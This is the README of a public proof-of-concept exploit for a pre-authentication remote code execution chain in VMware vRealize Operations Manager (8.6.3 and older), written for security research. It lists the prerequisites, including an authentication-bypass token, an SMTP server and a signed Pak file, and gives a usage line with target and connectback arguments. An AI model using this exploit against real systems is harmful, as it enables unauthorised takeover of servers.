This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROps) that affects versions <= 8.6.3.19682901.
Steven Seeley of Qihoo 360 Vulnerability Research Institute
The exploit was tested against 8.6.3.19682901 using the file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova
(SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00), but it is known to work against other, older versions as well.
This exploit chains three vulnerabilities that have been patched. More details can be found in the blog post:
-
This exploit requires the attacker to supply:
- A valid dashboardlink token, which is used to bypass authentication.
- Their own SMTP server settings; these are needed to ensure that exploitation works.
- A valid Pak file that is signed by VMware, such as APUAT-8.5.0.18176777.pak.
There are a lot of moving parts in this exploit; hopefully I engineered it right so that it works on the first shot.
The exploit takes on average ~1m34.142s to complete (tested 5 times). I tried to engineer this to be faster, but it is within the time allocated for a competition ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9